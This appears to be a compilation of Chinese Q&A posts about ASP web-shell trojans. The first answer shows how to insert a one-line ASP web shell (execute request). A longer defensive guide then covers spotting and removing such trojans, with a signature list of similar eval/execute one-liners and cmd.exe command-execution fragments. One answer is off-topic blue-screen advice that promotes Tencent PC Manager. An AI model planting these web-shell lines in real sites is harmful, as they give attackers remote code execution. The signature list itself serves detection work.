asp木马ASP网站老中木马，如何预防及清除

如何在asp网页中插入一句话木马

<% execute request("value") %> asp只要含有这个代码，可以上传任意程序。

asp网站被挂木马

额。

用dw把木马程序查找，替换了。

记得备份。

dw里查找可以查找所有打开的文件。

很简单的。

我用 一句话和蓝屏大叔连接端连接asp 木马，怎么出现个这个啊？？大侠帮帮忙啊

愿我的答案 能够解决您的烦忧 第一，可能是您的显卡不兼容锁导致的蓝屏，建议您在安全模式下卸载显卡驱动，并安装电脑显卡附赠驱动盘上的驱动。

第二，可能是软件冲突锁导致，您可以在桌面--右击--属性--高级选项---硬件加速调到最大或最小 第三，如果上述可以解决您的蓝屏，我建议您安装腾讯电脑管家，进行一个安全体检，清除系统沉淀垃圾（因为系统垃圾也有可能导致您的电脑崩溃蓝屏） 第四，在安装驱动中，可以打开腾讯电脑管家---工具箱---硬件检测--安装驱动，由腾讯电脑管家自动检索您电脑硬件最新驱动，保证您电脑驱动的正常使用。

如果您对我的答案不满意，可以继续追问或者提出宝贵意见，谢谢

ASP网站老中木马，如何预防及清除

关于ASP防马法 给你以下供参考： 1. 时间比较法 　　按时间顺序找到最近被改动的asp文件 ，打开看下，是不是木马呢，什么，看不懂代码, 那你就把不是你自己放的asp文件，名字看一眼就看的出的。

比如说diy.ap.dm6.asp,angel.asp.shell.asp什么的文件，可疑的asp文件不是你自己创建的删除，或直接访问下看下是不是木马就可以了 　　2. 查找关键字，asp木马都是有关键字的，也就像病毒的特征码，我们用windows自带的搜索功能就能查找到 ，查找包含内容为关键字的所有文件就可以了，找到以后看下就可以了，有时候能查找到一些asp的大文件，如果是虚拟主机的话，一般是数据库文件改成asp的了，如果是一句话木马的关键字就小心了，如果是大型木马的关键字，咱们访问一下看看，我不赞成把数据库改成asp的，至于为什么，大家都知道吧。

　　我整理了一些特征码，现在给大家 gxgl lcx <script RUNAT=SERVER LANGUAGE=JAVAscript>eval(Request.form(’#’)+’’)</script> 输入马的内容 session("b") request("kker") 非常遗憾,您的主机不支持ADODB.Stream,不能使用本程序 传至服务器已有虚拟目录 警告:对非法使用此程序可能带来的任何不良后果责任自负!请勿用于非法用途!!! <%execute request("value")%> ccopus <%execute(request("＃"))%> <script language="vbscript" runat=server>if reques(＃")<>"" then execute(request("＃"))</script> ("cmd.exe /c "&request.form("cmd")). ("cmd.exe /c "&request("cmd")). ("cmd.exe /c "&request("c")). 　　这些都是关键字了，全部是我从木马里面一个一个提取出来的，如果有这些特征的话，一般都是木马 ，不过大家最好打开看一下,不排除特殊情况。

如果你的网站里，有类似代码：<iframe src="" ></iframe> 估计可能是被加入的恶意连接，或着被挂马了，好狠毒，那么请在关键词中搜索iframe src， 　　3. 大家也可以用明小子的asp木马扫描的这个小工具拉，把我的关键字放进去，扫描一下，挺方便的，呵呵 　　4. 在网站结构清楚的情况下，浏览目录法能快速确定木马，在不该出现的地方出现的文件，管他是不是木马都可以删，比如说dvbbs下的 upfile这些文件夹里是不应该出现asp文件的，我们一发现就删除就是了 ，不过要求管理员对自己的网站目录结构熟 　　5. 有一种方法可以试下，就是做好备份，一旦发现有人入侵，马上还原，这样什么木马也不怕了，不过要注意的是，把保证备份文件是安全的 ，要是备份文件里也有木马，让就没搞一样的 　　6. 用asp木马追捕的文件，查杀，网上有下载的，另外我们常用的杀毒软件也有这样的功能，我推荐大家采用卡巴斯机，效果非常好，几乎能查杀如今所有流行的asp木马 　　上面只是简单的介绍了一下，asp木马的一些查杀方法，当然这些只是亡养补牢了，我们最好对服务器系统进行严格的权限限制，让黑客即使是上传了木马也没有什么用，这里权限的限制我就不多说了等下不知道要写多少，网上的资料也很全面的，大家可以自己去查找西。

而且现在说来说去，asp木马的隐藏方法确实是很高明，asp木马代码加密，图片合并，文件时间修改，还有要命的系统漏洞利用等等这对于要百分之百查杀asp木马的查杀，几乎不可能，我们只有堵住木马上传的源头 ，asp程序尽量用最新版本，网站中的上传途径自己应该特别注意，对于不需要脚本运行的文件夹在iis里面设置，执行许可为无，还有就是管理员要求有良好的安全意识，不然的话，谈不上安全了，并且我们设置了权限之后， 传了也是白传。